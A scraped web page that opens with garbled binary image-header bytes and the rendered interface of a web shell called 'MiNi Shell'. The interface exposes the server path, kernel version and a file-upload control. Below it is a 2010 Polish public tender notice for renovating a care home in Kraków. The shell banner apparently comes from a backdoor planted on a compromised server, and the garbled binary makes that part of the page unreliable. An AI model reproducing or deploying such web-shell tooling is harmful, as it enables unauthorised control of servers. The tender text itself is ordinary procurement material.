JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100727/226858-N-2010.html

<p class="kh_header"><b>Kraków: Modernizacja DPS przy ul. Kluzeka 6 w Krakowie w celu dostosowania jednostki do wymogów prawa oraz  potrzeb osób niepełnosprawnych</b><br>
<b>Numer ogłoszenia: 226858 - 2010; data zamieszczenia: 27.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Seniora Naftowca" , ul. Kluzeka 6, 31-222 Kraków, woj. małopolskie, tel. 012 4152592, faks 012 4152592 w. 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpskluzeka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja DPS przy ul. Kluzeka 6 w Krakowie w celu dostosowania jednostki do wymogów prawa oraz  potrzeb osób niepełnosprawnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest modernizacja kuchni, modernizacja pralni, modernizacja pomieszczeń piwnicznych , ocieplenie budynku, likwidacja barier architektonicznych wokół budynku, modernizacja korytarzy  
Zakres robót to:
Modernizacja kuchni
Przed przystąpieniem do prac należy opracować dokumentację technologii kuchni oraz uzyskać opinię rzeczoznawcy lub Sanepidu
1.roboty rozbiórkowe
rozebranie ścianek działowych, rozebranie obmurowania pionu kanalizacyjnym, rozbiórka posadzek  wraz z podłożem, demontaż stolarki drzwiowej szt 2 ,okienka podawczego szt1 , odbicie tynków
2.roboty murowe
obłożenie płytami gipsowymi wodoodpornymi pionów kanalizacyjnych oraz konstrukcji stelaży do zabudowy lekkiej, ścianki działowe gr 12 cm  z cegły
3.roboty tynkowe
tynki cementowo-  wapienne, uzupełnienie tynków na ścianach i sufitach, gładź gipsowa na ścianach i sufitach
4.roboty malarskie i okładzinowe
usunięcie starej powłoki malarskiej, malowanie  farbami lateksowymi ścian i sufitów    w mocnych barwach uzgodnionych z zamawiającym, Obłożenie ścian płytami PVC kuchni, zmywalni, wydawalni,  flizowanie ścian magazynka podręcznego, obieralni, zaplecza pracowników  kuchni, magazynka środków czystości płytkami na pełną wysokość ścian, 
5.roboty podłoża i posadzki
wykonanie izolacji przeciwwodnej 2 x papa na lepiku wykonanie nowych wylewek, ułożenie posadzek z płytek terakotowych matowych antypoślizgowych o wym. 20x20 cm zapleczu pracowników kuchni, magazynku środków czystości; ułożenie posadzek PCV zgrzewalnych w kuchni, zmywali, wydawalni, obieralni, ,magazynku podręcznym
6.roboty instalacji wod.- kan.
Wymiana poziomów i pionów kanalizacyjnych od piwnic i  parteru wraz z wymianą podejść do przyborów , wymiana instalacji wodnej i c.w.u., demontaż umywalek, zlewozmywaków ze stali nierdzewnej, montaż baterii ściennych przy basenach i zlewozmywakach na kuchni. Na  zapleczu pracowników  kuchni  montaż  brodzika o wym 90x90 cm., montaż  kabiny prysznicowej półokrągłej  z wypełnieniem ze szkła hartowanego gr 6 mm , uszczelka między kabiną a brodzikiem, uszczelką magnetyczną, podwójne kółka łożyskowane;  WC wiszące montowane na stelażach typu GEBERIT( lub równoważne) do zabudowy lekkiej z deską sedesową amortyzowaną, przyciskiem spłukującym dwudzielnym;   bateria prysznicowa termostatyczna z głowicami ceramicznym z wodooszczędną końcówką(perlator), bateria umywalkowa stojąca, baterie ścienne zlewozmywakowe szt 2, baterie ścienne wraz z wężami do basenów szt 2 z głowicami ceramicznymi. Wymiana instalacji gazowej.
7.roboty instalacji elektrycznej i niskoprądowej 
wymiana instalacji elektrycznej  ,  wymiana gniazd wtykowe, montaż osprzętu elektrycznego typu LEGRAND lub równoważny, montaż opraw oświetleniowych zwieszanych ,w łazience oprawy oświetleniowej IP44 
8.stolarka drzwiowa, 
wykucie ze ścian ościeżnic, osadzenie ościeżnic oraz skrzydeł drzwiowych aluminiowych pełnych szer 90 cm z klamkami i szyldami okrągłymi, drzwi  w kolorze białym  szt 4 , stolarka do pomieszczeń z zamkami zamykanymi na klucz w systemie  typu MASTERKEY, wymiana okienek podawczych wykonanego aluminium o wymiarach 160x60 rozsuwane wraz z zamkami, parapety okienek obłożone nakładkami ze stali nierdzewnej.
10.wywóz gruzu wraz z opłatą wysypiskową 

11 wykonawca odpowiada za demontaż,  zabezpieczenie, montaż  istniejącego  wyposażenia kuchni, .W razie jego uszkodzenia zobowiązany jest do jego niezwłocznej naprawy bądź odkupienia.

12 Wymiana instalacji elektrycznej zgodnie z dokumentacją projektową

Modernizacja pralni
Przed przystąpieniem do prac należy opracować dokumentację wentylacji pralni oraz zaprojektować klimatyzację prasowalni
1.roboty rozbiórkowe
rozebranie ścianek działowych, rozebranie obmurowania pionu kanalizacyjnym, rozbiórka posadzek  wraz z podłożem, demontaż stolarki drzwiowej szt 8 , odbicie tynków, rozebranie zabudowy ściennej szafami przesuwnymi szt 2
2.roboty murowe
obłożenie płytami gipsowymi wodoodpornymi pionów kanalizacyjnych oraz konstrukcji stelaży do zabudowy lekkiej, ścianki działowe gr 12 cm  z cegły
3.roboty tynkowe
tynki cementowo-  wapienne, uzupełnienie tynków na ścianach i sufitach, gładź gipsowa na ścianach i sufitach
4.roboty malarskie i okładzinowe
usunięcie starej powłoki malarskiej, malowanie  farbami lateksowymi ścian i sufitów    w mocnych barwach uzgodnionych z zamawiającym, Obłożenie ścian komunikacji, magazynku brudnej bielizny, suszarni, pralni, prasowalni, szwalni, magazynku czystej bielizny płytkami  na pełną wysokość ścian, 
5.roboty podłoża i posadzki
wykonanie izolacji przeciwwodnej 2 x papa na lepiku wykonanie nowych wylewek, ułożenie posadzek PCV zgrzewalnych we wszystkich pomieszczeniach pralni
6.roboty instalacji wod.- kan.
Wymiana poziomów i pionów kanalizacyjnych od piwnic i  parteru wraz z wymianą podejść do przyborów i urządzeń  , wymiana instalacji wodnej i c.w.u., demontaż umywalki, demontaż wanny, montaż wanny , montaż umywalki, wykonanie nowych odpływów połączonych na sztywno z urządzeniami 
7.roboty instalacji elektrycznej i niskoprądowej 
wymiana instalacji elektrycznej  ,  wymiana gniazd wtykowe, montaż osprzętu elektrycznego typu LEGRAND lub równoważny, montaż opraw oświetleniowych zwieszanych ,w łazience oprawy oświetleniowej IP44 
8.stolarka drzwiowa, 
wykucie ze ścian ościeżnic, osadzenie ościeżnic oraz skrzydeł drzwiowych aluminiowych pełnych szer 90 cm z klamkami i szyldami okrągłymi, drzwi  w kolorze białym  , stolarka do pomieszczeń z zamkami zamykanymi na klucz w systemie  typu MASTERKEY, szt 6
10.wywóz gruzu wraz z opłatą wysypiskową 

11 wykonawca odpowiada za demontaż ,  zabezpieczenie, montaż  istniejącego  wyposażenia pralni, .W razie jego uszkodzenia zobowiązany jest do jego niezwłocznej naprawy bądź odkupienia.

12 Wymiana instalacji elektrycznej zgodnie z dokumentacją projektową

Modernizacja pomieszczeń piwnic
Przed przystąpieniem do prac należy opracować dokumentację adaptacji pomieszczeń oraz ich wentylacji 
1.roboty rozbiórkowe
rozebranie ścianek działowych, rozebranie obmurowania pionu kanalizacyjnym, rozbiórka wylewek wraz z podłożem, demontaż stolarki drzwiowej szt 20 , odbicie tynków, 
2.roboty murowe
obłożenie płytami gipsowymi wodoodpornymi pionów kanalizacyjnych oraz konstrukcji stelaży do zabudowy lekkiej, ścianki działowe gr 12 cm  z cegły, zamurowanie istniejących otworów zrzutowych  w szachtach, poszerzenie otworu i szachu do montażu platformy zewnętrznej, zamurowanie otworu drzwiowego szer 80 cm szt1, poszerzenie otworu drzwiowego wraz z wykonaniem nadproża szt1
3.roboty tynkowe
tynki cementowo-  wapienne, uzupełnienie tynków na ścianach i sufitach, 
4.roboty malarskie i okładzinowe
usunięcie starej powłoki malarskiej, malowanie  farbami lateksowymi ścian i sufitów    w mocnych barwach uzgodnionych z zamawiającym, Obłożenie ścian komunikacji, projektowanych magazynów tj, jarzynowego, spożywczego, chłodni  płytkami  na pełną wysokość ścian, 
5.roboty podłoża i posadzki
wykonanie izolacji przeciwwodnej 2 x papa na lepiku wykonanie nowych wylewek, ułożenie posadzek z płytek antypoślizgowych we wszystkich pomieszczeniach modernizowanych pom. piwnic
6.roboty instalacji wod.- kan.
Wymiana poziomów i pionów kanalizacyjnych od piwnic i  parteru wraz z wymianą podejść do przyborów i urządzeń  , wymiana instalacji wodnej i c.w.u., montaż zlewozmywaka dwukomorowego wraz z baterią ścienną, wykonanie odpływów wraz możliwością przepompowywania wody do poziomu kanalizacyjnego na wysokość 2m 
7.roboty instalacji elektrycznej 
Wykonanie zasilania pomieszczeń magazynowych , wykonanie odwodów gniazd wtykowych 230 szt 12 szt oraz 360 szt 2, wykonanie obwodu oświetlenia pomieszczeń piwnic, wykonanie zasilania platformy zewnętrznej , montaż tablicy zasilającej wraz z wyposażeniem  
8.stolarka drzwiowa, 
wykucie ze ścian ościeżnic, osadzenie ościeżnic oraz skrzydeł drzwiowych aluminiowych pełnych szer 90 cm z klamkami i szyldami okrągłymi,szt 5 ; osadzenie ościeżnic oraz skrzydeł drzwiowych aluminiowych pełnych szer 80 cm z klamkami i szyldami okrągłymi,szt 16; osadzenie ościeżnic oraz skrzydeł drzwiowych aluminiowych pełnych szer 70 cm z klamkami i szyldami okrągłymi,szt 3, drzwi  w kolorze białym  , stolarka do pomieszczeń z zamkami zamykanymi na klucz w systemie  typu MASTERKEY, 
9.wywóz gruzu wraz z opłatą wysypiskową 





Modernizacja korytarzy

Wykonanie ścianki aluminowej z wypełnieniem szkłem bezpiecznym , w kształcie litery L o wymiarach dłuższy bok 2m x 1,60 wysokość ścianki 2,5 m wraz z drzwiami aluminiowymi dwudzielnymi  o wymiarach 2,05x1,2 wypełnienie drzwi szkło bezpieczne.wraz z zamkiem i szyldem , zamek w systemie MASTERKEY
Poszerzenie otworów drzwiowych szt 2 z wymiaru 80 cm do 90 cm wraz obróbka ościeży, wyrównanie poziomów posadzki korytarza przez ułożenie płytek antypoślizgowych w korytarzu . 6m2
Malowanie ścian korytarzy parteru farbą lateksową w kolorze pomarańczowym oraz żółtym - 300m2

Ocieplenie ścian budynku

Zakres robót został określony w dokumentacji projektowej , specyfikacji technicznej wykonania i odbioru robót, oraz pomocniczo w załączonym przedmiarze robót
Likwidacja barier architektonicznych wokół budynku
roboty rozbiórkowe
rozebranie istniejących nawierzchni asfaltowych chodników, dróg dojazdowych wraz z obrzeżami i krawężnikami

roboty drogowe
korytowanie , profilowanie, warstwy podbudowy, ułożenie geowłókniny pod drogami, ułożenie chodników z kostki betonowej gr 6 cm, ułożenie kostki brukowej gr 8 cm na drogach, ułożenie płyt ażurowych parkingowych. Kostka w kolorze szarym , pasy z dwóch stron chodników i dróg w kolorze czerwonym
roboty instalacji elektrycznych
wykonanie zasilania wraz z oddzielnym obwodem zasilania  pod lampy ogrodowe, włączane przez czujnik zmierzchowy lub ręcznie, montaż puszki hermetycznej ziemnej do zasilania lampek - szt1

wywóz gruzu wraz z opłatą wysypiskową

zabezpieczenie roślin
Wykonawca odpowiada za zabezpieczenie roślin wzdłuż chodników. W razie zniszczenia dokonanie nowych nasadzeń

szczegółowo przedmiot zamówienia został określony w załączonych dokumentacjach projektowych,  spec techn. wykonania i odbioru robót, założeniach programowych modernizacji kuchni, pralni pomieszczeń piwnicznych. przedmiarach  robót stanowiący część składową niniejszej specyfikacji.
Roboty będą realizowane w oparciu o dokumentację projektową, specyfikację techniczną wykonania i odbioru robót, przedmiary robót, założeń funkcjonalno - użytkowych modernizacji kuchni , pralni, pomieszczeń piwnicznych

KODY CPV 45210000-2 Roboty budowlane w zakresie budynków
45300000-0 Roboty instalacyjne w budynkach
45400000-1 Roboty wykończeniowe w zakresie obiektów budowlanych



2. Warunki dodatkowe:

a)Wykonawca zobowiązany jest do uwzględnienia w ofercie wszystkich kosztów, jakie poniesie w związku z realizacją przedmiotu  zamówienia w tym koszty segregacji , wywozu śmieci, koszty badań.
b)Prace prowadzone są w czynnym obiekcie 
c)Podana cena brutto na realizację zamówienia winna uwzględniać wszelkie rabaty i upusty zastosowane dla zamawiającego,. Podana przez Wykonawcę cena brutto będzie traktowana przy ocenie ofert jako cena ostateczna. 
d) Ofertę sporządza się w języku polskim (łącznie z wymaganymi dokumentami), z zachowaniem formy pisemnej pod rygorem nieważności.
e)Minimalny okres rękojmi na wykonane roboty budowlane 36 miesięcy.
f)Minimalny okres udzielonej gwarancji na wbudowane materiały - 24 m-ce
g)Wykonawca sporządzi kosztorys powykonawczy, stanowiący wraz z protokołem odbioru robót , podstawę do wypłaty wynagrodzenia Wykonawcy. Kosztorys powykonawczy będzie sprawdzony i zweryfikowany przez inspektora nadzoru inwestorskiego.
h)Wykonawca ponosi bezpośrednią odpowiedzialność za szkody wynikłe w związku z niewłaściwym wykonaniem przedmiotu zamówienia.
i)Wykonawca ponosi odpowiedzialność finansową za spowodowanie zniszczeń w trakcie realizacji prac związanych z realizacją przedmiotu zamówienia.
j)Wykonawca przekaże Zamawiającemu pomieszczenia wysprzątane.
k) Zamawiający przekazuje Wykonawcy robót pomieszczenia kuchni oraz pralni na okres 2 miesięcy.
l) W przypadku przedłużenia robót w tych pomieszczeniach i nie uruchomienia ich działalności w przeciągu 2 m-cy wykonawca pokrywa koszty dziennego wyżywienia mieszkańców oraz koszty dziennego prania zlecanego na zewnątrz. 
m) Koszty te Wykonawca przejmuje od Zamawiającego już w pierwszym dniu opóźnienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>do 50% zamówienia posdstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.00.00.00-0, 45.40.00.00-1, 45.31.00.00-3, 45.33.00.00-9, 45.33.10.00-6, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium  w wysokości 20 000 zł
( słownie dwadzieścia tysięcy złotych00/100).
2.Wadim może być wnoszone w jednej lub kilku następujących formach:
2.1 pieniądzu
2.2 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
2.3 gwarancjach bankowych
2.4 gwarancjach ubezpieczeniowych
2.5 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U.z 2007r. Nr42,poz275)
3.Wadium wnoszone w formie poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej, poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości należy złożyć w formie oryginału w Dziale Administracji najpóźniej w dniu złożenia oferty do godz. 9:00. Natomiast do oferty należy załączyć potwierdzoną za zgodność z oryginałem kserokopię.
4.Wadium wnoszone wniesione w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego nr 07 1240 4722 1111 0000 4854 3590 z dopiskiem na blankiecie przelewu jakiego postępowania dotyczy. Kserokopię dowodu przelewu potwierdzona za zgodność z oryginałem należy dołączyć do oferty.
5.Zamawiający zwraca niezwłocznie wadium zgodnie z zasadami określonymi w art. 46 upzp
6.W przypadku wnoszenia wadium w formie pieniądza, Wykonawca z zachowaniem właściwej staranności winien dokonać przelewu pieniężnego z odpowiednim wyprzedzeniem, gdyż za termin wniesienia wadium w formie pieniądza przyjmuje się termin uznania kwoty wadium na podanym wyżej rachunku bankowym.
7.Dokument wniesienia wadium w formie gwarancji lub poręczenia powinien zawierać bezwarunkowe i nieodwołalne zobowiązanie gwaranta lub poręczyciela do zapłaty Zamawiającemu wymaganej kwoty wadium, na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium, powstałe na skutek okoliczności określonych w ustawie- art. 46 ust. 4a i 5 ustawy.
8.Wadium dla konsorcjum może być wniesione przez lidera konsorcjum lub przez wskazanego w umowie konsorcjum partnera.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert zawierające nazwisko osoby (osób) uprawnionych do reprezentowania wykonawcy oraz przedmiot działalności.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Wykonał z należytą starannością w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty remontowo-budowlane polegające na budowie lub remoncie budynku mieszkalnego, biurowego, administracyjnego lub innego użyteczności publicznej  na kwotę minimum  500 000,00 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Dysponuje osobami wyznaczonymi do sprawowania funkcji kierowniczych przewidzianymi do zatrudnienia przy realizacji kontraktu, w tym:
a)kierownikiem budowy z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej w zakresie objętym niniejszym zamówieniem;
b)kierownikiem robót instalacyjnych z uprawnieniami budowlanymi do kierowania robotami w zakresie objętym niniejszym zamówieniem;
c)kierownikiem robót elektrycznych posiadającym uprawnienia budowlane do kierowania robotami w zakresie objętym niniejszym zamówieniem oraz posiadającym świadectwo kwalifikacyjne D ;
Zamawiający wymaga, aby osoby, od których wymagane jest posiadanie odpowiednich uprawnień legitymowały się aktualnym zaświadczeniem o przynależności do właściwej Izby Samorządu Zawodowego, jeżeli przynależność do takiej Izby wynika z odrębnych przepisów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1Wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, w szczególności poprzez wykazanie, że: 
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia spełnienie poniższych warunków Wykonawcy mogą wykazać łącznie)
1.Posiada środki finansowe na rachunku lub zdolność kredytową na kwotę, co najmniej 
200 000,00 zł;
2.Jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia minimum  200 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

